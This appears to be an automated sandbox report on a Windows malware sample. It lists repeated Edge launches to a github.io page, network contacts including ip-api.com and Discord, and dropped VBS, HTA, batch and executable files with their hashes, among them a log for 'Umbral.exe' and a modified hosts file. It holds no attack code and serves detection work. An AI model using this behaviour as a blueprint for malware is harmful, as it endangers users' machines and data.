"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://theshitposter78.github.io/cactus

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://theshitposter78.github.io/cactus

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://theshitposter78.github.io/cactus

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://theshitposter78.github.io/cactus

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://theshitposter78.github.io/cactus

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://theshitposter78.github.io/cactus

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://theshitposter78.github.io/cactus

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://theshitposter78.github.io/cactus

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://theshitposter78.github.io/cactus

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://theshitposter78.github.io/cactus

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://theshitposter78.github.io/cactus

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://theshitposter78.github.io/cactus

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://theshitposter78.github.io/cactus

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://theshitposter78.github.io/cactus

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://theshitposter78.github.io/cactus

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://theshitposter78.github.io/cactus

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://theshitposter78.github.io/cactus

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://theshitposter78.github.io/cactus

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://theshitposter78.github.io/cactus

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://theshitposter78.github.io/cactus

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://theshitposter78.github.io/cactus

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://theshitposter78.github.io/cactus

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 185.199.111.133:443 raw.githubusercontent.com tcp
US 8.8.8.8:53 133.111.199.185.in-addr.arpa udp
NL 172.217.23.195:443 gstatic.com tcp
US 35.227.215.6:443 image.noelshack.com tcp
US 208.95.112.1:80 ip-api.com tcp
HU 217.65.97.74:443 ddl8.data.hu tcp
US 208.95.112.1:80 ip-api.com tcp
US 162.159.135.232:443 discord.com tcp
NL 52.111.243.29:443 tcp
US 162.159.129.233:443 cdn.discordapp.com tcp
US 162.159.129.233:443 cdn.discordapp.com tcp
US 185.199.109.153:80 theshitposter78.github.io tcp
US 185.199.109.153:80 theshitposter78.github.io tcp
US 8.8.8.8:53 githubstatus.com udp
US 8.8.8.8:53 help.github.com udp
N/A 224.0.0.251:5353 udp

Files

C:\Users\Admin\AppData\Local\Temp\8BD5.tmp\8BD6.tmp\8BD7.bat

MD5 0a45f9a236bbcd265c0c42f31a98b97f
SHA1 c959b0487c1ab6ed111bee3d1f80bcc3032125a4
SHA256 38e4173ae8927a3bea9499ab2b9141d8f42f39383478633b0a4b98c0c661d0ff
SHA512 2935422f584afd8fde06d8838621c94205aa2ae67397b1d3ed3cb2e4d80d67e53d84cef2eaae4d3ea3c4dfc5e9282d712aab458dcd29660f9ae1215258fa1c72

memory/4348-2-0x000002C119870000-0x000002C1198B0000-memory.dmp

memory/4348-3-0x00007FFAA00A3000-0x00007FFAA00A5000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\21446.vbs

MD5 5f54089b9a444209633e886792a8505b
SHA1 3e3d5003c67de8657661e28bc2350f0e4ea72ee3
SHA256 c3107e49aae33c8a125d968ff8643fdba3ecb8049172daf103f3389e2ec135c4
SHA512 f684d5a376b826fe5ff1bb2a3ac73d378ea3e546e0e6ff6c5a77f991967d1b1d68180b3ab465936c98b7438b4b540a62b697d047fd2bef31456f4498a77ec118

C:\Users\Admin\AppData\Local\Temp\14329.vbs

MD5 93e179454db6fe9ac81112193de37cde
SHA1 4752aec95d506cac3ed9c61f0fbbd9cf6bd0cde9
SHA256 8286f8a1d4cceae4ece0de6082109286f17c1234ee09e453ac9507185068c7cc
SHA512 a38411dd6eb30050e6100bd20e79e8f4d650c1a4ad646516370f603a28900dfc424292f83cd7b49b1296bf7b25ce6ce907ef8dee964ded2e6b79475a6741f207

C:\Users\Admin\AppData\Local\Temp\21446.vbs

MD5 135594160762ab9dd80794d7b34ab32a
SHA1 638fef88bbb5d310c51eda07ca10918a482ad3ac
SHA256 531eef292dba871300a5b31d9601bab2b8c03be17cc0aa28e216f82a5df01fa0
SHA512 19a8b0024abb6e22103aaf8654619ee803cb8ae2bfd21d6bb7c648a4dfb1a06936144d308cc3d0ebdd86d38b87434d2e3a152f541153d42d03b4ad767b72b54d

memory/3664-101-0x000002049D580000-0x000002049D5A2000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_bwu10jxo.u5n.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

MD5 627073ee3ca9676911bee35548eff2b8
SHA1 4c4b68c65e2cab9864b51167d710aa29ebdcff2e
SHA256 85b280a39fc31ba1e15fb06102a05b8405ff3b82feb181d4170f04e466dd647c
SHA512 3c5f6c03e253b83c57e8d6f0334187dbdcdf4fa549eecd36cbc1322dca6d3ca891dc6a019c49ec2eafb88f82d0434299c31e4dfaab123acb42e0546218f311fb

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 2e8eb51096d6f6781456fef7df731d97
SHA1 ec2aaf851a618fb43c3d040a13a71997c25bda43
SHA256 96bfd9dd5883329927fe8c08b8956355a1a6ceb30ceeb5d4252b346df32bc864
SHA512 0a73dc9a49f92d9dd556c2ca2e36761890b3538f355ee1f013e7cf648d8c4d065f28046cd4a167db3dea304d1fbcbcea68d11ce6e12a3f20f8b6c018a60422d2

memory/4348-126-0x000002C134060000-0x000002C1340D6000-memory.dmp

memory/4348-127-0x000002C1340E0000-0x000002C134130000-memory.dmp

memory/4348-128-0x000002C134130000-0x000002C13414E000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 4b92d741d003e8d1f0394874017a6fe9
SHA1 1a4bebc2637bce160dae38d4d0bfdeb6b398059d
SHA256 8c8532230d71f0818daebff0d2ab496b02c25bdaa7156701f663b5474ad876fc
SHA512 5c2e84b072314aaae414f98f7dbeb13e030561b53270803d0cf7a8c6ed59368dcfdc4666e69abef39fcac5b75968a1174aca501023297a276a219ed0464612c6

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 7332074ae2b01262736b6fbd9e100dac
SHA1 22f992165065107cc9417fa4117240d84414a13c
SHA256 baea84fda6c1f13090b8cbd91c920848946f10ce155ef31a1df4cd453ee7e4aa
SHA512 4ae6f0e012c31ac1fc2ff4a8877ce2b4667c45b6e651de798318a39a2b6fd39a6f72dffa8b0b89b7a045a27d724d195656faa25a9fec79b22f37ddebb5d22da2

memory/4348-162-0x000002C134020000-0x000002C13402A000-memory.dmp

memory/4348-163-0x000002C134150000-0x000002C134162000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 acede48f49e8026833a6e1bf72616add
SHA1 3da845d5a6982185e0dc50b24b0b57b8e7a0a448
SHA256 d235b714a3cccb7ef743776ce6c92f8584fb84bc5e65dcaba6771a9a0749f69a
SHA512 24bf778258cd2ff848c9f4948d4957a02d54cce6f4f9b1c4bee70acd60e396289f837a7e19cc98808bdb15a2f3f47a307d54117d0580b97079a7fd43655b3469

C:\Users\Admin\AppData\Local\Temp\19074.vbs

MD5 3a7e0a94fa88dccd40d9b76b37d06db1
SHA1 d7604ddb660898ce3b1343aa712cf5926bc68bda
SHA256 368a1589e414e50d554cf0d871bd49b11f9cd9f189876c86a5caef92d158e6a4
SHA512 19b8377a708301fb719e43433b9c0a592346ea94206870e3ba2c77f901b17598dd977fd711e591b5d0fc46982ed83e62cfbbe678eabe43de494bdde176c89fcb

C:\Users\Admin\AppData\Local\Temp\26117.vbs

MD5 aabbe725da9751315bbeeda4ef58d816
SHA1 476c78912d61e790a793c8e6606825f2b169947c
SHA256 0422247afae1a1556e7832c45f4f1913a61cbace2be53aad58967ea9e6315360
SHA512 0e1a523c947013a1a23574d125294270cb8c6b8e4fd97630f7c35122a33b9d95e7a073cbe23f0ed3f78246dd8b2db2c4401e994eace3b9e3bdbe696708b887dd

C:\Users\Admin\AppData\Local\Temp\19267.vbs

MD5 8a9b451fd9936100f33b576bb5ec3f02
SHA1 80c92544f733ddfb96dffa296293fb2835e85f2e
SHA256 4e17707eab52e31f035b13f68cce1aa2636680abde9de955fdf1495641660455
SHA512 b11700e12cc1c921dbf3cd017595dbb18befdb5a89e80295aa99ef8d5d23d3e689bf6b011927da27cb88ac93feea8fcef822b4b7acd92c26b32d5791773e911f

C:\Users\Admin\AppData\Local\Temp\risitas.hta

MD5 af25ddf889ed3804a85b487a95993a94
SHA1 e22ce7ce7e6b18400913de410be90fa79c2b6edb
SHA256 bfa65bf74a7c96fc8a0ffc527d2fb143d349059466d6248fe2c0d45212baa3ab
SHA512 8f5a9eef4daee35d9ff9e7a2f9c4ba92cc89a5443a9cf5e563dc23317a1546862b3b73be865ba1aa0e2668d5bee84d05fd66042171235a35347794ab6aa3297c

C:\Users\Admin\AppData\Local\Temp\26847.vbs

MD5 523092d53a06f5b46778a0cd7c01d0fb
SHA1 221a8244271afdbe7ce105aaf189f1dbcfa57cdb
SHA256 09c2ca44b387ae9f69f0c001729c71313bae1d935ad99723a02ebfc0d2757c3e
SHA512 72015f1a996c56b6eab20590cdb2689124b87494a2ae8fb5fb0678dfb4bfd49046f66b23b0348a70942d74664e22051d5be5994de518414baa47ad81e77400eb

C:\Users\Admin\AppData\Local\Microsoft\Windows Media\12.0\WMSDKNS.XML

MD5 5433eab10c6b5c6d55b7cbd302426a39
SHA1 c5b1604b3350dab290d081eecd5389a895c58de5
SHA256 23dbf7014e99e93af5f2760f18ee1370274f06a453145c8d539b66d798dad131
SHA512 207b40d6bec65ab147f963a5f42263ae5bf39857987b439a4fa1647bf9b40e99cdc43ff68b7e2463aa9a948284126ac3c9c7af8350c91134b36d8b1a9c61fd34

C:\Users\Admin\AppData\Local\Temp\28486.vbs

MD5 e04b980f81eddd7fad10acdc27793002
SHA1 ad88c7e0bbaa4470a892af63b4ab1e0c460e09a8
SHA256 fd05de63104067166b2225248f89f5a8d9b86ae7c090b025e0b08f90054e0663
SHA512 636c561da9a8644d95bbcdb09f427c05012a3ce72c1dbfb430b156fcceffdf6708cd0a83133576eea8a070d16e01c4630e57c98f178c26c95d7767cb44025e36

C:\Users\Admin\AppData\Local\Temp\2561.vbs

MD5 ec385d968eea8bf5abe4587305f39c89
SHA1 6509b0bb7cb6432a4c723f37dc7593116ad57c64
SHA256 98adff52d2e37335bc6fb9811a2759ab8bd86c6ca116818114a0ab88474a6f96
SHA512 d5ff6edac9fcc50a634ff949268004bc396a07bb472fce532166140964acbbb4195e99a02dae8a426e2c4f7a9c64a89d283361340615d89ef7465acbab5b26a8

C:\Users\Admin\AppData\Local\Microsoft\Windows Media\12.0\WMSDKNS.DTD

MD5 90be2701c8112bebc6bd58a7de19846e
SHA1 a95be407036982392e2e684fb9ff6602ecad6f1e
SHA256 644fbcdc20086e16d57f31c5bad98be68d02b1c061938d2f5f91cbe88c871fbf
SHA512 d618b473b68b48d746c912ac5fc06c73b047bd35a44a6efc7a859fe1162d68015cf69da41a5db504dcbc4928e360c095b32a3b7792fcc6a38072e1ebd12e7cbe

C:\Users\Admin\AppData\Local\Temp\19628.bat

MD5 4a9699c0d134b2b5b1f58cc33674f45c
SHA1 8ee1d4225898740ec63d56e9600cfc5c742bacaf
SHA256 ad38dbcd5d795409da32568d5c041f73504b20925de468bac980ffc68680e0bd
SHA512 97273ca0bdbb9711139b2c3fad93bd64c865d35b65ce2c60d108966ce0f9ff4ab137c03e8de466770322309bd40c431367e30d796fa85d5c03219b36e67111f7

C:\Users\Admin\AppData\Local\Temp\melter.exe

MD5 d9baac374cc96e41c9f86c669e53f61c
SHA1 b0ba67bfac3d23e718b3bfdfe120e5446d0229e8
SHA256 a1d883577bcb6c4f9de47b06fe97c370c09bddffb6569b6cf93576371bdbc412
SHA512 4ecdf8757e75b02da06a9d42a8ca62b9f2ef292dc04fa37d96603af78433f8aa9dd82fcf1e128a8f463b9691dcc1645b4a64e34f3c5d631f3a0e0670da0d0457

C:\Users\Admin\AppData\Local\Temp\1617997407-risitas.jpg

MD5 597cf1068c84a5c01afd9472a7453116
SHA1 bc9a638c47aab57b04b2257f421a48b2ee682732
SHA256 0d124f8aedb0b4461c31ee54f6d68ba1288b47c373a9bfe6c1a323e958836799
SHA512 3eaf9c358446ed124817d34523ad6155629f5d4ad11770f918fff6096d1d6f66ee790fac8488b908b424fd4761f0b26011b3e0a2b21bca406f73ca3fe1e17600

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

MD5 e8115549491cca16e7bfdfec9db7f89a
SHA1 d1eb5c8263cbe146cd88953bb9886c3aeb262742
SHA256 dfa9a8b54936607a5250bec0ed3e2a24f96f4929ca550115a91d0d5d68e4d08e
SHA512 851207c15de3531bd230baf02a8a96550b81649ccbdd44ad74875d97a700271ef96e8be6e1c95b2a0119561aee24729cb55c29eb0b3455473688ef9132ed7f54

C:\Windows\system32\drivers\etc\hosts

MD5 4028457913f9d08b06137643fe3e01bc
SHA1 a5cb3f12beaea8194a2d3d83a62bdb8d558f5f14
SHA256 289d433902418aaf62e7b96b215ece04fcbcef2457daf90f46837a4d5090da58
SHA512 c8e1eef90618341bbde885fd126ece2b1911ca99d20d82f62985869ba457553b4c2bf1e841fd06dacbf27275b3b0940e5a794e1b1db0fd56440a96592362c28b

\??\pipe\LOCAL\crashpad_1480_DUOPZZSOHWODJSAO

MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

MD5 3e2612636cf368bc811fdc8db09e037d
SHA1 d69e34379f97e35083f4c4ea1249e6f1a5f51d56
SHA256 2eecaacf3f2582e202689a16b0ac1715c628d32f54261671cf67ba6abbf6c9f9
SHA512 b3cc3bf967d014f522e6811448c4792eed730e72547f83eb4974e832e958deb7e7f4c3ce8e0ed6f9c110525d0b12f7fe7ab80a914c2fe492e1f2d321ef47f96d

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 bc624f54f0459c970dec3e25c0d63aad
SHA1 db6c7f6306c9178cf297ba0e8917cd07ddcf3385
SHA256 05feaca82024d3ffcc464c04616ef14124c900cedbbe95209914f27d368e7639
SHA512 a126dd6f3cf3dcea8546f4183f33a08356395a17f27a4f8e0233a4da6ae2da704b3b7c394eb9c06ef5d2725b42c49f5b9c5b0e5258c7fe991e45f36ef3fb1645

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

MD5 839a1e7d9914c7ffed29d60f6c1dff72
SHA1 635787867bcd2009321f0ddd3de0502afa626459
SHA256 46afd1d110ba06bf9b61885e1e87e9357848e0cf59e61e8aa2074d5eaf498482
SHA512 5814471923e484fa44e272c75da5dcf227592f4f8c5b01319bc83f2e015bca830854ca06994080e89c0418c9b4e34d181b1af8e6e5c45e83cb1216b7950a5518

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 42a5875edd6e17f58025539846aafd59
SHA1 d0b052b62ddfcf493af1540561cc95a9cc8877e6
SHA256 562d25d3c8f0505986b8ffa967bad8e079057575f70b93432c010a0d55a54d14
SHA512 bfc0287122505e480b83bbee5798e9dbd1779af43d0d5e0aa22c888581f5578fd8e94f85b2a1dd6673d828ab4f5be67097316060c633840ea2f11e47f476b87e

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Last Version

MD5 b29bcf9cd0e55f93000b4bb265a9810b
SHA1 e662b8c98bd5eced29495dbe2a8f1930e3f714b8
SHA256 f53ab2877a33ef4dbde62f23f0cbfb572924a80a3921f47fc080d680107064b4
SHA512 e15f515e4177d38d6bb83a939a0a8f901ce64dffe45e635063161497d527fbddaf2b1261195fde90b72b4c3e64ac0a0500003faceffcc749471733c9e83eb011

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\Umbral.exe.log

MD5 5f36c205799cb2f8966c7d5130cea05c
SHA1 614993e3437ff9363c3eb698d7dba379a453dd6e
SHA256 8eaaf40fe7570c8fa593702f38fee2f54538ba6a77d7c54005e8d1f150f5180c
SHA512 7053cac09d2e71675771bae4ac25f1a47f96be662f6bb2aab24668ed4c1809fb1261b2d6465202c09bd0310bf875361a815db6dda6006dcfbbb5fb3c50c5927b

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\data_3

MD5 80fc131eff4e41dfe3771cbc7df8dd3c
SHA1 0275724be910b852dd59d7f91396db83d2734dc2
SHA256 aee8717b3c7a0e1e7dc3871d68e825b28d35ddad7b733c938045a7ff1aaeae8d
SHA512 40a578f962d4672ec42617603743a1ab9c8ade52044f0bce31ac8075588b983b97bed8547a74f18f20e5ea91607ebb20400ac3399ab75954e20252b1e85d56fa

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\data_1

MD5 c90f5e5c871eeaf4d666de4d5b259a6e
SHA1 7fda7c24a2f340579ea3f50631d1812d008ab2d2
SHA256 4c7d6dc11b89b7d74607bef59b138bad2a19093c2f53bba8d05385840c464904
SHA512 b1a3500339c063f21b7e1d2e8fed6d3a273f84936d28de5f1d502e5bd6b3a19a1dad17918539d5984377b65535c2e7939a4ba6c32dc9bcecb32b97b88ed5a244

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\GrShaderCache\GPUCache\data_3

MD5 0669229f86ef9e62461b525048f176d7
SHA1 356dc74c21e7d35507ccba6be498b5d7aa7b4e10
SHA256 cb560ec9583a612007174bc9ea5df4cd3c2725b258ae56ee83da5b1712a9df47
SHA512 ae2ca49d77eaee360a5429a114479e00873a45d5b46e37035ac36620630ec9baab0265d5d2c2b649710887e2c985b2468b9ea0cd8660eceda11de0d43905775f

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\GrShaderCache\GPUCache\data_1

MD5 ef85c1fc73c998cd0fead3fab3850fd8
SHA1 a67641d1eed173591b1f0953f58d14bb3cad3ae5
SHA256 c8fc219900512c7767cdbd6c37e98c37f71711557ba8e7bc4720bad63b33ea14
SHA512 80c48d84c1ac726a4cdbb5318bc7d640c15df5e29e42f7a3ec608324fcce5c3ce705504ec3f2f00d0503450cdc849bbd5b541e579bb400c1853014171d8569ec

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\GrShaderCache\GPUCache\data_0

MD5 72510d3a6dffea7cd88e55bc3069ca9e
SHA1 bf97f37c757763020a2d5d3ef51a8da75b47de25
SHA256 3fa00bfe2f81eac188ad7d6e4dca325d413becbc8d70fbfbfbec2391d4e7ebf5
SHA512 967186d544e281f07e1141993dfc3e4b1f06b672c134b011a05f80ec2beb5d19c8e83a99381f4d6fd5153b5360ab70bae30db0c170e05a7958924c376a9323c9

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\data_0

MD5 2b609a32e6d4ca4a073ddd33132aad93
SHA1 96fa3f6964dfe19924b96a37b867643fccb226a3
SHA256 8370cca929cb8efdcc9781dec4bf18ef166b6cc26ca268a495e7b22d986f5bfe
SHA512 0ef3dc4256614da97c7aa9723648e3573f26d93ed69e3831de4e80a02464a0a4a6929ffd984b193a84a80a3d668ecc4f81efd06f1def10c809e10067c738fd09

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 a67eee085e8f68aaffbfdb51503d6561
SHA1 29db9b41945c6a5d27d5836a1c780668eded65a0
SHA256 6e155bcc98f4e175a8701f030b73b14d9002b175ef58a19cb9010af3964e36b4
SHA512 7923bc74260e77d62b20cf510b79e0422563469ec3543084a989db154b1e39370f1a6e6c6e73caa7471d0974a693b1beb4fd2ddfb14b0b5c58650b5df3c32d81

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\reports\e4a7bacd-0b4f-4ad3-8c19-70004fb872ac.dmp

MD5 2265733dd69be2d428ad02d9269bad5d
SHA1 9a35f34232894af34338edc4a20043ce82308504
SHA256 364144072c4a1bdfecb6ad3165e076c95bfb67beb9c0d15990d11275d2b58b63
SHA512 fe6797aad5976ffc9ab7b4372945f5c8cef8a2c274e293591eb28cde9b0ea48699a2f975d4aa880f19d5db58bc6738bfc05c1e6100793f3f424f364197d281ea

C:\Users\Admin\AppData\Local\Microsoft\Media Player\CurrentDatabase_400.wmdb

MD5 51dc6a6d54af59bd360b0d80eb9f8175
SHA1 dc884c6a7bd2d8f7c53f77639736be34a6ff428b
SHA256 8b94c33739767abf1c14a25159201b30407a05d0cecb36431f4eea6c83f195ba
SHA512 d133f3d83dedc702ebc43e28787cbb35cdb3f71e757b8af8d2a5c8474c59423325c25c8f46f1f4a0a12cdbfb0e4a4717bfbc91f5b05c5b78f2698eccd32d4896

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT

MD5 46295cac801e5d4857d09837238a6394
SHA1 44e0fa1b517dbf802b18faf0785eeea6ac51594b
SHA256 0f1bad70c7bd1e0a69562853ec529355462fcd0423263a3d39d6d0d70b780443
SHA512 8969402593f927350e2ceb4b5bc2a277f3754697c1961e3d6237da322257fbab42909e1a742e22223447f3a4805f8d8ef525432a7c3515a549e984d3eff72b23

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT

MD5 206702161f94c5cd39fadd03f4014d98
SHA1 bd8bfc144fb5326d21bd1531523d9fb50e1b600a
SHA256 1005a525006f148c86efcbfb36c6eac091b311532448010f70f7de9a68007167
SHA512 0af09f26941b11991c750d1a2b525c39a8970900e98cba96fd1b55dbf93fee79e18b8aab258f48b4f7bda40d059629bc7770d84371235cdb1352a4f17f80e145

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

MD5 80675a463a22d2a0791872e47737ce11
SHA1 8d9dfd7f851eddda1d0998b552541b17eeaae346
SHA256 ced7e356ce9cc2dad664718a3e70a018210f6cafdc3403cfb1464a472011f15f
SHA512 ca44fb4037b63ad2f724bcb95677ccb60ccd836f3a3dfae06cad63361a831ddcf9b2fdae6b56ece71987e009dd810fe954604abf10ed78e59f4419b1ad87a06c

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\01b75cac-801b-41d5-a909-1d587ecee83d.tmp

MD5 cd73bda3ddb0322b65cd103465da6092
SHA1 54c0e6de9c5b6761fef0b04e8d6c173b99bfb086
SHA256 879cecf61dd2705c04275e7c7f5df8837925b5454f130e9ff634f8a06f19b19c
SHA512 bcc7921d22e2fb4c275e1a3c9553a28a6c0382ca5cc17b8f307cb7cebada26294b1139b92234f9318f76139c67b3cebf46c16058b813aa2a8da969fdf1d782f6